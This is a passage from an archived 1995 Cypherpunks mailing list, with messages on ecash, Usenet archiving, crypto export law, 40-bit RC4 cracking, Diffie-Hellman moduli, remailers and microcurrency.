respond to a random challenge, sent to her by Bob. This random challenge
could possibly be a hash of Bob's identity and some other values.
My impression though is that this is not a feature of the current
implementation of ecash.

>Off-list there has been some discussion about the role of certificates in
>ecash, and in cash systems in general.  It would be interesting to know
>if this anti-theft provision of Digicash is actually provided by means of
>a certificate.

It is conceivable to think of the above mentioned methods in that way,  yes

/Lars Johansson
ljo@ausys.se





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 6 Nov 95 17:22:44 PST
To: cypherpunks@toad.com
Subject: Re: DejaNews all over again--a URL for Usenet Searching
Message-ID: <acc3f0380a02100406fd@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


[Please don't copy Eugene Volokh <VOLOKH@law.ucla.edu> on your follow-ups;
I copied him on my original because I had quoted him.]

At 10:04 PM 11/6/95, s1113645@tesla.cc.uottawa.ca wrote:

>Judging by the amount of posting you do here, I was surprised that I only
>got 36 listings on your new address (1/3 of which quoted you but not
>directly written by you). Either you post more to alt, soc and talk (which
>they
>don't have) or you use a third address (the second thing I tried was
>tcmay@netcom.com, even less, though the archive's pretty recent, so that's
>expected).

I do little posting these days on Usenet. There is almost no sense of
"community" there, in the sense of persistent, memorable posters, and in
the sense of even _slightly_ having similar goals and aspirations. A vast
number of the posts on any topic come from people who just rolled off the
turnip truck and who have no interest in learning.

>I figured I'd send this to you as a private note, but then I figured
>this thing really is scary and has a lot to do with anonymity.
>Watch out folks. Litte Brother is saving everything you've ever said on
>usenet. Your old posts just won't go away.

I've assumed this for many years. One used to be able to buy "Usenet on
CD-ROM"...before the volume got to be too high. I've always assumed that
archives would be increasingly available, eventually covering the entire
history of Usenet, going back to the early 80s, and with tools for tracking
the changes in login names over time (so that, for example, Perry's 1984
postings could be easily retrieved).

Dossier services are coming, of course. If not legal to operate in the
U.S., trivial to locate offshore. ("Employers, we will provide a scan of
prospective employers. We can let you know if potential employees have ever
posted to alt.drugs, alt.homosexual, alt.deviancy, or alt.cypherpunks.
Avoid needless risks.")


>(Not that someone who is so open in his views and true name as yourself
>would mind, Tim, but I'm certainly happy for my sake, that alt isn't archived
>yet. It's bad enough they have rec.)

Huh? What makes you think "alt" is not archived? Just because DejaNews
doesn't index it doesn't mean it is isn't archived in various places.

Paul Robichaux pointed me to another searcher, http://www.excite.com/,
which _does_ index the alt groups. I'm sure more are coming, reaching
further and further back in time. (At the rate the Net has been expanding,
by the time they can archive-and-index the last year of Usenet, they can
get the entire history for not much more. I'll bet this happens by the end
of 1997.)


>Ps. I will of course run searches on every other address that the who
>command on majordomo@toad.com supplies me with, so watch what you say
>ladies, gents and otherwise. ;->
>Get those 'nyms ready.

I offered the "Blacknet Dossier Service" a couple of years ago to the
Extropians list subscribers. Nick Szabo helped me out by claiming to the
list that he had purchased his dossier contents, and was "shocked" by what
he found. A number of the Extropian list subscribers were quite perturbed
before I told them it was a joke. Then I pointed out to them that there is
absolutely nothing which stops such things.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 6 Nov 95 18:20:48 PST
To: "Peter D. Junger" <junger@pdj2-ra.f-remote.cwru.edu>
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <m0tCcXa-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <199511070208.VAA14762@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Peter D. Junger" writes:
> : I understand that you are a lawyer and I'm not, but it is my
> : understanding that international treaties come in to play on this sort
> : of thing. For instance, in international shipments, you can transship
> : items and substances that are illegal to possess in a country through
> : its ports provided that the materials do not originate or terminate
> : their shipment in the country and remain sealed in their containers
> : throughout. It is also my understanding that items like mail and phone
> : calls that happen to transit a country are not necessarily subject to
> : that nations laws provided that the nation is not a terminal point for
> : the mail or call or what have you.
> 
> The trouble is that the ITAR's definition of export that is relevant
> to cryptographic software has nothing to do with exporting in the
> normal sense, and therefore it has nothing to do with transhipments.

I am starting to have trouble believing you are a lawyer. Are you
actually telling me that treaties which explicitly indemnify
transshipment customers against local laws are superceeded by lower
level laws, in spite of the supremecy clause of the constitution? That
might be what the state department would tell you, but I'd have
trouble believing even a lobotomized mongoloid judge would let that
stand. Treaties are treaties, period.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 7 Nov 95 01:47:51 PST
To: cypherpunks@toad.com
Subject: Re: [noise, personal reply] CBC address.
Message-ID: <199511070946.BAA06926@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


A post from Alice, that might be worth reading twice ...


On Sun, 5 Nov 1995 s1113645@tesla.cc.uottawa.ca wrote:

> 
> On Sat, 4 Nov 1995 anonymous-remailer@shell.portal.com wrote:
> 
> > Does anyone on this list know if the CBC has a web site on the Net?
> <www.cbc.ca>  They have a lot of shows in .au (so I hear) or accessible by 
> realaudio. Don't know if they have any mpigs [sic] though. There's an alt 
> newsgroup too.

Uhhm, thanks ... I guess ... but I wasn't _really_ looking for the 
CBC web site.

I was actually looking for someone to HOST a website which might 
showcase one particular program from the CBC, a program broadcast
in Canada which highlighted how AECL (Atomic Energy of Canada, Limited)
fails to practice safe computing and then when confronted, implements
a calculated program of strategic misrepresentation.  (i.e.  they lie.)

I thought that someone who strongly felt that error-free protocols and
error-free methods were important -- especially in mission critical
applications like medicine, commerce, or nuclear power plants -- might
possibly contact the CBC, and either voluntarily donate some bandwidth
and a host site, or conversely build a site devoted to showcasing the
human tragedy that can follow in the wake of shoddily designed
software.

I mean, good grief, we have Atomic Energy of Canada taking a cavalier
attitude towards computer code.  Not only is AECL involved in nuclear
medicine, in building wonderful radiological tools to help cancer
patients (theoretically) live, but they BUILD nuclear reactors worldwide.  

The CBC broadcast documented how this international firm REACTS to
reports of computer software errors.  It documents how the firm reacts
to reports of people dying because of sloppily written computer code.

The program is NOT (unfortunately) on the www.cbc.ca website, but
should be placed on the net and made available.  I'm not sure how, 
that was misunderstood.

But your next statement helped make it clear.

> You oughta use Sameer's (or someone else's) replyable remailer when asking 
> questions Alice.

I wasn't really asking for an answer, my Ottawa friend.  I really wasn't
looking for _another_ email in my mailbox to answer and address in my
copious spare time.  I was looking for some assistance. 

No direct reply was necessary.  

Someone could simply announce that they were volunteering to quarterback
bringing a host website online, and dealing with all the issues that are
involved with that (including liasing with the CBC.)

I'm not *quite* sure how you misread what I was hoping to achieve.

If however, you were looking to convince me to post to from a remailer
that allows replies ... one that might let you send me known plain text
back through it ... something traceable back to me ... then I *might*
really understand, and I might beg off for a bit. 

Bit premature, and such ...

I think I'll pass on _that_ offer, especially since I really wasn't
looking for a personal private reply to what I wrote. 

Maybe, if I requote myself, it will be a little clearer all around.

(That's, strike two, btw ... to my Ottawa friend.)


Here's what I wrote:

> I know that it is rude to follow up one of your own posts, and I
> apologize in advance for this horrible faux-pas, but hopefully, it's
> excused this one time.  I wrote:
>
>
> >One example of this that should serve as a useful case study is a recent 
> >problem which was brought to the Canadian public's attention just this 
> >week, on a program called the Fifth Estate.  The CBC (Canadian 
> >Broadcasting Corporation) detailed a software code problem in one of 
> >AECL's (Atomic Energy of Canada Limited's) instruments which deliver 
> >penetrating radiation.  
> >
> >The software which controlled the radiation dose, would periodically 
> >override the oncologist's calibration and deliver a radiation dose 100 
> >times what was prescribed.  This software "bug" literally killed wherever 
> >the machine was in use.
>
> Does anyone on this list know if the CBC has a web site on the Net?
>
> I'm hoping that someone (hint, hint) who has a convenient website, one
> with lots of spare bandwidth could volunteer to contact the CBC and
> persuade them to copyright clear the Fifth Estate program clip which
> documented some of the risks of software bugs in mission critical
> applications, and allow it to be placed on the Net.  I'm hoping that this
> English language piece reaches a wide international audience. 
> 
> The Canadian Broadcasting Corporation is a Crown Corporation which has
> historically received its primary funding from the Government of Canada. 
> Recently, it has suffered under the budgetary ax, and the push for
> privatization.  I'm pretty confident that the Corporation would copyright
> clear the clip for MPEG distribution across the Net, if they were
> approached with the concept that the clip was a demonstration of the CBC's
> journalistic excellence and integrity, a piece which is demonstrative of
> the critical need to continue their funding.  A concrete demonstration of
> the need for the CBC.  And a piece which could well receive deserved
> international acclaim. 
>
> The site would help them, and would simultaneously be a site of
> international public service. 
>
> Nothing will drive home the need for quality software, quality code, and
> quality security more than the vivid graphic pictures of the consequences
> of sloppy code, or of the risks if certain critical systems, LANs, or
> private networks are compromised, or if security and privacy (which are
> flip sides of the same coin) are ignored. 
>
> The sight of a body, that has had a hole burned straight through it from
> the front through to the spine is truly chilling and drives the message
> home.  Nothing seems to speak as clearly as a picture ... as to what the
> stakes are ... of what "bugs" in code do ... and of what a network
> compromise can leave in its wake. 
> 
> A picture of consequences.
> 
> Six people died in Canada and the United States due to the software flaw. 
> Even after numerous reports of the flaws, the company refused to even
> acknowledge the existence of a problem, and in fact did everything within
> its power to make sure doctors, radiologists and physicists were unaware. 
>
> The attitude of trivialization can only be characterized as fantastic, and
> would be unbelievable to anyone who has not viewed the piece. 
>
> It's one hell of a backgrounder which not only details problems, but looks
> at solutions -- it examines attitudes, especially management attitudes.  It
> truly deserves an expanded audience.  From teachers, to students, to the
> international media, to the concerned private individual, all will be
> served well if this piece gets wide attention. 
>
> Takers, anyone??

Now, how on earth, (after rereading what I wrote) did my words get
misunderstood??  And how on earth did someone figure that they needed to
establish a bi-directional communications channel with me?? 

I mean it's not like I'm atacking AT&T or Netscape, I'm simply trying to
coordinate a basic public service, and blow the whistle on bad code.

Blow the whistle on software which people expect (rightfully) to be
reliable ...  software which people expect (rightfully) not to cause any
human harm. 



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jolson@squeaky.free.org (jolson)
Date: Tue, 7 Nov 95 04:57:54 PST
To: cypherpunks@toad.com
Subject: Software development
Message-ID: <199511071301.HAA11964@squeaky.free.org>
MIME-Version: 1.0
Content-Type: text/plain


Two suggestions for new product development
1.  Secure virtual disk drives for OS/2

2.  A combination of secure email server/client for public domain use such 
    as this E-Mail list.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 7 Nov 95 04:40:41 PST
To: cypherpunks@toad.com
Subject: Re: censored? corrected [Steve Pizzo cited in The Spotlight]
Message-ID: <9511071238.AA00909@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>Sorry.  But still, then intent was to be user-friendly (right?), and
>a side effect was to make it possible to renumber without anyone noticing.

No.  DNS was created because the management of everyone editing and
downloading one huge file was just falling apart.  The Arpanet always
used names instead of numbers.  Moving hosts around was always possible.

CIDR doesn't affect that fact that if nntp.com switches, say, to BBN Planet
then I will have to get a new address.  CIDR just says you can route based
on smaller/larger granularity than IP Network Address classes.

>That's the connection between DNS and routing, and it's why using names
>instead of numbers is Good.

There is no connection.  Using names instead of numbers is good.  It
does bring up an interesting philosophical question about where the
True Name really is.  And how DNS must be part of your TCB unless/until
you have end-to-end mutual authentication.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 7 Nov 95 16:50:14 PST
To: cypherpunks@toad.com
Subject: Re:  forging headers (with more header information)
Message-ID: <199511080049.QAA23866@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>Without having any access to anything but the headers, it looks like
>you are an employee for SGI and sent the message from there.
>
>Look at the last Received: header.  It went from sgi.com to mit.edu to
>well.com and then to you.

Obviously was forwarded from a remailer inside SGI ....

#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hilarie Orman <ho@cs.arizona.edu>
Date: Tue, 7 Nov 95 18:14:26 PST
To: karn@qualcomm.com
Subject: Re: Photuris Primality verification needed
In-Reply-To: <199511080146.RAA22568@servo.qualcomm.com>
Message-ID: <9511080214.AA12812@uncial.CS.Arizona.EDU>
MIME-Version: 1.0
Content-Type: text/plain


>  Well, since we already require 56-bit DES in ESP in the interests of
>  promoting basic interoperability, wouldn't a 512-bit prime be
>  similarly sufficient?

If you are willing to accept that in all likelihood, one year from
now, some group will announce that can "crack" all key exchanges that
using the published modulus, then sure, call it sufficient.  There is
certainly precedent; it was my understanding that Sun did not change
their SecureRPC modulus when informed of LaMacchia and Odlyzko's work.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephen Whitaker <whitaker@sover.net>
Date: Tue, 7 Nov 95 18:21:28 PST
To: Geoff Commons <COMMONS@psd.state.vt.us>
Subject: Electronic-reply issues
Message-ID: <199511080220.VAA14821@maple.sover.net>
MIME-Version: 1.0
Content-Type: text/plain


[Key Words: public records; privacy; encryption; archives;
Telecommunications Plan;]

November 7, 1995

Mr. Geoffrey Commons Esq.
Special Counsel
Vermont Department of Public Service
State Street
Montpelier, Vermont 05602

Dear Mr. Commons:

Thank you for your prompt reply to my document request.

Yes, I will accept your electronic correspondence as your 'written' reply.

However, this brings up several good points which I would ask that you
follow up on:
The receipt of an e-mail message does not, in and of itself, assure the
recipient of the messages' authenticity, privacy or preservation. 

On the authentication issue, it is well known that the message headers are
absolutely insufficient to authenticate the sender of a message. Digital
technologies, using encryption, are required here. Other issues are the
privacy of the message along it's long path between your desk and my office,
and the records later availability,  _in electronic format_, if requested. 

Regardless of the fact that we work only a thousand feet apart here in
Montpelier, this message has probably traversed, _in clear text_, through
Hartford CT., Albany NY., or Boston MA. prior to being exchanged between the
so called 'gov-net' and sover.net. Your reply has also probably been backed
up to a tape at the DPS, combined with other exempt public records dealing
with current regulatory litigation or consumer complaints. These storage
procedures, or lack thereof, could serve to impede future access to these
and other records by the public.

The original voice mail request and it's written reply take on some form of
public records status where, by statute, records must be cataloged so as to
be locatable if requested, and archived for a certain period of time
pursuant to an approved records retention schedule. Those schedules are
approved by the director of public records, John Yacavoni.

It occurs to me that the DPS is required under the Vermont statutes
governing the preparation of a Ten Year Telecommunications Plan, to analyze
telecommunications  technologies and the implication of their use in both
the public and private arenas. The pertinent parts of the statute are
included here for your convenience.

*******************begin_included_document****************************
30 VSA 202d
                       *        *       *
        >(b)  The department, through the director, shall prepare a
telecommunications plan for the state.  The plan shall be for a 10 year
period and shall serve as a basis for state telecommunications policy.  The
plan shall include at a minimum:
>		(1)  an overview, looking ten years ahead, of statewide growth and
development as they relate to future requirements for telecommunications
services, including patterns of urban expansion, statewide and service area
economic growth, shifts in transportation modes, economic development,
technological advances and other trends and factors which, as determined by
the director, will significantly affect state telecommunications policy and
programs;
>		(2)  a survey of Vermont residents and businesses, conducted in
cooperation with the agency of development and community affairs, to
determine what telecommunications services are needed now and in the
succeeding ten years;
>		(3)  a study and evaluation of conversion to measured service as ordered
by the board;
>		(4)  an assessment of the current state telecommunications system and
evaluation of alternative proposals for upgrading the system to provide the
best available and affordable technology for use by government.
>	(c)  In developing the plan, the department shall take into account the
policies and goals of section 202c of this title, and the need for basic
service at affordable rates, improved competition among providers, the needs
of the state as user of telecommunications services, and future development
of the state.

*******************end_included_document***************************

It would then logically follow that a thorough analysis of these issues,
which are not created by, but are certainly complicated by
telecommunications technologies, should be included in the forthcoming Draft
of that plan. The department would then offer the citizens and the business
community an opportunity to recommend changes or elaboration on those draft
recommendations. These should include, but are not limited to the use of
digital signatures, authentication and encryption technologies, and last but
not least EDI or Electronic Document Interchange.

These technologies are relevant to the state as a whole as far as
positioning our citizens and businesses to participate in the rapidly
emerging era of electronic commerce (where absolute privacy protections are
essential), but are also immediately relevant to the gov-net/ school-net
implementation, and even to the workings of your Department of Public
Service and the quasi-judicial Public Service Board in order to enable
electronic filings, to expedite the backlog of dockets and to answer
official document requests.

As far as I know there is no other working group addressing these issues at
present. Possibly your 'written' reply to my public records request,
delivered via e-mail, will serve to catalyze such an effort in the context
of a PSB-DPS working group (open to the public, of course) or in one of the
amazingly effective forums in which your commissioner participates dealing
with telecommunications.

One more question: was the voice mail message which I delivered to you,
which certainly constitutes a record "created or acquired in the course of
agency business", retained, cataloged and archived? Or, if it was destroyed,
was it pursuant to an approved records retention schedule? I recall the
voice mail message to your Commissioner relating the Clyde River Dam
negotiations which prompted a headline story and wish to emphasize the
relevance of these new technologies and the management of public records.

I look forward to your thoughtful reply, or that of your Commissioner,
Richard Sedano.
Now aren't you glad you use e-mail?

Sincerely,

Stephen Whitaker
Design Access Network
P.O.Box 1331
Montpelier, Vermont 05601-1331

whitaker@sover.net



At 06:22 PM 11/7/95 EDT, you wrote:
>November 7, 1995
>
>Dear Mr. Whitaker:
>
>     I have today received your request (left on my voice mail 
>yesterday, 11/6) to inspect certain documents.  I understand your 
>request to be for access to all staff analyses and internal or 
>external correspondence regarding 9-1-1 costing or implementation, 
>prepared or received by the Department of Public Service during 
>calendar year 1995.  Please let me know if I have misunderstood your 
>message.
>
>     I have relayed your request to all DPS staff, and we are in the 
>process of collecting and reviewing responsive documents.  Due to the 
>length of time covered by your request, as well as its breadth, it will be 
>a few days before I can be sure that I have collected and reviewed all 
>responsive documents.  Therefore, pursuant to 1 V.S.A. sec. 
>318(a)(5)(B), I am advising you that I expect to make the requested 
>documents available no later than Tuesday, November 14.  If I can 
>make them available earlier, or if unexpected delays are encountered, 
>I will let you know.  Otherwise, you may inspect the documents at the 
>DPS, 112 State Street, Montpelier on November 14 as provided by 
>statute.
>
>     Since you requested my reply by e-mail, I am assuming that this 
>message will suffice as "written notice" under the Access to Public 
>Records law.  Please let me know if you would prefer a response by 
>ordinary mail.
>
>     Thank you for your inquiry and continuing interest in these 
>matters.
>                                                           Sincerely,
>
>                                          Geoffrey Commons, Special Counsel
>

Stephen Whitaker	

///////////////////////////////////////////////////////////////////////

     _/_/_/              _/_/             _/      _/
    _/    _/           _/   _/           _/_/    _/
   _/     _/         _/_/_/_/           _/  _/  _/
  _/    _/          _/    _/           _/    _/_/
 _/_/_/   ESIGN    _/    _/ CCESS     _/      _/ ETWORK

///////////////////////////////////////////////////////////////////////

Design Access Network		   	 802.479.6118
Post Office Box 1331  			 whitaker@sover.net     		
Montpelier, Vermont     05601-1331	 PGP public key available





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Wed, 8 Nov 95 01:54:48 PST
To: cypherpunks, gnu
Subject: Call For Papers - Conference on Redistributable Software
Message-ID: <9511080954.AA13883@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


[I'm hoping that we can get some papers on freely redistributable
*crypto* and *security* software -- like PGP or PEM or SSL_eay or
Kerberos or brute-force tools or SATAN or Java tools or whatever!  I'm
on the program committee and am trying to make the conference as broad
as possible, not just focusing on "traditional" free software.  Help!
--gnu]

		CALL FOR PAPERS

	First Conference on Freely Redistributable Software

	Sponsored by the Free Software Foundation

		2-5 February 1996
		Cambridge, MA

Over the past 15 years, free and low-cost software has become ubiquitous.  
This conference will bring together implementors of several different types 
of freely redistributable software and publishers of such software (on 
various media).

There will be tutorials and refereed papers, as well as keynotes by
        Linus Torvalds and Richard Stallman

The Conference will be held at the Cambridge Center Marriott, 
2-5 February 1996.  

Papers are invited on any aspect of GNU, Linux, NetBSD, 386BSD, FreeBSD, 
expect, PERL, tcl/tk, and other tools for which the code is accessible 
and redistributable.

Extended abstracts are due on or before Thursday, 30 November 1995. 

Authors will be notified no later than 8 December.
Full papers will be due Thursday, 4 January 1996.

Program committee:
        Peter H. Salus, chair
        Robert J. Chassell
        Chris Demetriou
        John Gilmore
        Marshall Kirk McKusick
        Rich Morin
        Eric S. Raymond 
        Vernor Vinge

Abstracts of 350-750 words (in troff, PostScript, or straight ASCII, 
only) should be sent to
        conf96@gnu.ai.mit.edu
-- 
-----------------------------------------------------------
Peter H. Salus  #3303  4 Longfellow Place  Boston, MA 02114
	+1 617 723 3092
-----------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 9 Nov 95 18:21:36 PST
To: cypherpunks@toad.com
Subject: Re: Market Value of Web Pages
Message-ID: <acc7f59c06021004e10b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:43 AM 11/10/95, Mark wrote:

(Description of a Web page earning $3,600,000 a year elided.)


>If you toss arguements like this at some of the sites that would be viable for
>the hit numbers and then explain the only way that will occur is if the crypto
>laws are repealed, you will create a lot more lobbiers annoying their reps
>for the cause. ecash without good crypto is like the Federal Reserve
>deliverying cash with open pickup trucks. Or doing credit card purchases on
>postcards.

And if you make arguments that this is easy to do, and add that crypto laws
are stopping this from happening, you risk losing your credibility.

The current crypto export laws are a pain, but are not stopping these
"million hits a day" transactions. Recall that the 40 bits allowed in
Netscape for export took some non-trivial number of machine-hours to crack
(I'm talking about the brute force crack by Damien G. and others, not the
more recent exploitation of the RNG weakness). While this brute force crack
showed the limitations of the 40-bit key for certain transactions, it is
not a viable attack on a single transaction whose value is pennies.

As to the "$3.6 million a year," nice work if you can get it.

I fully expect some folks to make a lot of money. But beware the siren call
of make.money.fast...most people won't.

In any case, let's not claim that the lack of strong exportable crypto is
the reason these "Web millionaires" are not all around us. (Actually, a lot
of them are, but because their companies are doing so well, not because
their home pages are getting a million hits a day.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Fri, 10 Nov 95 19:01:29 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: Diffie-Hellman in GF(2^n)?
Message-ID: <Pine.SUN.3.91.951110184600.19312B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Most Diffie-Hellman implementations currently use the multiplicative group
of prime fields.  However, the multiplicative group of finite fields of
characteristic 2 (GF(2^n)) can also be used and should be easier to
implement.  Is there any reason why they should not be used?  Does anyone
know the asymptotic running time of the best algorithm for calculating
discrete logarithms in GF(2^n)? 

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 11 Nov 95 01:07:18 PST
To: cypherpunks@toad.com
Subject: Re: Who needs time vaults anyway?
Message-ID: <199511110908.BAA16272@ix12.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:15 AM 11/11/95 -0700, bryce@colorado.edu wrote:

>I don't really understand the use for "can't be opened until
>Christmas" tricks.  If you don't want anyone to see your info until
>Christmas then just don't give them a copy until then!  If you want
>to prove that you have it but not let them see it until later then
>do timestamping of hashes, zero-knowledge proofs and so forth.

For instance, suppose you want to give someone digicash on a certain day
(like a bond from your bank...)  Or leave a will, which nobody can hassle
you about while you're alive.  Or (as an extension of both) a trust that
can't be spent until some time certain in the future, like when you want
to pay Alcor to thaw your carcass out.

For the more realistic case, bonds, you want to be able to give them
the bond so they've got it in their hot little hands, but can't cheat by
spending it.  In a normal business relationship, where all the parties 
have names of some sort, this isn't so tough; it gets harder when 
some or all of you are pseudonyms...
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 11 Nov 95 01:07:22 PST
To: cypherpunks@toad.com
Subject: Re: Lotus Notes RSA Implementation Question
Message-ID: <199511110908.BAA16275@ix12.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:13 AM 11/11/95 GMT, bglassle@kaiwan.com wrote:
>>Notes V3 (the one currently deployed) uses 512 bit RSA keys in both the USA
>>and exportable versions. Notes V4 (currently in Beta) uses 512 bit RSA
keys for
>>encryption in the exportable version and bigger keys for signatures in all
>>versions and for encryption in the USA version.
>
>I would assume since they are using a key size >40 bit, it is used for
>authentication only, not for data encrytion, that would skirt the ITAR
>regs.  If fact according to the docs, there is no data encryption when
>connecting to an international version server, regardless of the
>client version.

RSA keys get to have more bits than symmetric-key encryption, because they're
easier to crack and you typically use them for different things.
The permitted length seems to usually be 512 bits for RSA and 40 bits for
decent-quality symmetric cyphers (as opposed to easy-to-crack proprietary
cyphers, which may be longer if they're wimpy and the NSA's in a good mood.)
Your mileage may vary, of course. 

>My understanding was that the problems exposed with RC4 that you
>mentioned, were with the particular implemenation by Netscape.  

There were two different problems found.  The first was a straightforward
brute-force crack on 40-bit RC4 (RC4 lets you choose key length...)
While it did have known plaintext near the beginning of the message,
having it _anywhere_ makes it crackable, with a bit more work.
The second problem was a Netscape-specific use of low-quality random
numbers to pick the RC4 keys.  But the first crack was the real thing.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@robo.remailer
Date: Sat, 11 Nov 95 02:00:08 PST
To: cypherpunks@toad.com
Subject: RadioMail and chaining remailers
Message-ID: <199511110954.BAA25548@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Hello All,

I am planning to purchase a HP200LX with a wireless modem with the 
RadioMail system, My question is.  Does the RadioMail software allow
chaining of messages for remailers? Is there other crypto applications
for the HP200LX's  

Thanks in advance!

Liam






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Thomas Junker" <tjunker@phoenix.phoenix.net>
Date: Sat, 11 Nov 95 01:04:46 PST
To: cypherpunks@toad.com
Subject: Re: the revolution of microcurrency
Message-ID: <199511110904.DAA12059@phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain


On  9 Nov 95 at 15:47, Vladimir Z. Nuri <vznuri@netcom.com> 
wrote:

> Subject:       the revolution of microcurrency

> the topic of "microcurrency" has come up on this list
> ...<snip>
> touting it as a revolutionary change in the economy. I
> ...<snip>
> agree with this wholeheartedly. the possibility that
> people can
> ...<snip>
> will all contribute to a REVOLUTIONARY effect on culture.

> my key idea on all of this is that the whole idea of
> copyright is going to melt when you introduce cash, not
> be strengthened. 

I don't think so.

> there are a lot of people out there who
> think that one has to try to put a lock and chain on web
> pages or whatever that one is "selling", and the
> horrible problem of the net is that anything can be
> copied. and these people are feverishly working on
> specious "solutions" to this "problem" right now.

What's happening is that while some people try to impose
book and magazine notions onto the Web, others gleefully
splatter the landscape with everything from the interesting
to the awful but are generally stopped short of making a
living at it by the absence of workable means of asking for
and receiving nominal sums.  

Meanwhile, some other people are realizing that today's
$30/yr newsletter of 20,000 circulation will become
tomorrow's 25-cent-per-copy newsletter of 2 or 3 hundred
thousand "circulation," making more total money and
reaching and influencing far more people. A much larger
volume of information will be worth a penny or less for a
peek.  When those transactions become close to transparent
and of unnoticeable latency, *then* we will see the
explosion that will put present Web growth into
perspective as the baby crawl that it is.

This doesn't amount to putting locks and chains on Web 
pages any more than newsstands put locks and chains on 
newspapers or magazines.  When it's cheap enough and the 
transaction is a no-brainer, the buyer gets easy access 
while the publisher has reason to be there publishing, and 
neither worries too much about the value of the single 
copy.

> says, "you have to protect what you are selling from
> other people or you won't make any money". this theme

No, the point is that you have to have a way of making 
something or you won't have any incentive to generate the 
information or make it available to others.  The news for 
today is that the way of making something on small amounts 
of low-value information is almost at hand.

> I submit that things like the release of public domain
> standards and products like Java and Netscape for free
> are not merely blips at this moment but increasingly are
> going to be the marketing plan of the future. the idea is
> that you give away your product for FREE, 

Standards are not the product.  Standards are what help
make a market possible for products that must interface
with other products.  The closed-system people may have 
seen this in the momentary light of their extinction.

> and then people pay you if they like it. 

Don't hold your breath.

> this new ideology will be relevant to products that are
> not "things" but in fact are more in the realm of
> intellectual property, i.e. writing, software,
> cyberspace web pages, etc.

Intellectual property is not new.  What's new are
distribution and fee collection systems with the potential
for incremental costs approaching zero.  Most of the
infrastructure for that is in place, in fact has been in
place for quite a few years.  What has been missing has 
been the critical mass of users actually participating, and 
near-zero cost payment mechanisms.  I'm spectacularly 
disappointed by the initial ecash and payment offerings, 
since they seem to miss the whole point and be aimed at 
web-transacted business no different that the high-overhead 
transactions that take place face-to-face in retail stores 
and by phone and mail.

> the beauty of this system is that NO LONGER is
> "unauthorized" distribution" the "enemy". it is your
> FRIEND, a key aspect of profit!!

Freely-distributable shareware has been around for 10-15 
years, and has grown from being the computer field's butt 
for bad jokes to a maturing distribution methodology that 
supports an increasing number of author/publishers offering 
some quite substantial and solid products.  It did this, 
by the way, without substantial benefit or contribution 
from the Internet or the Web.

> product to "authorized users". (i.e. those who pay in
> advance). our entire society thinks within this paradigm,

A big part of what is happening with microtransaction
evolution is that the buyer will be able to consider,
decide, and pay, all in the space of a second.  You can
forget about anything based on paying in "advance," and
all those draconian mechanisms -- they won't exist because
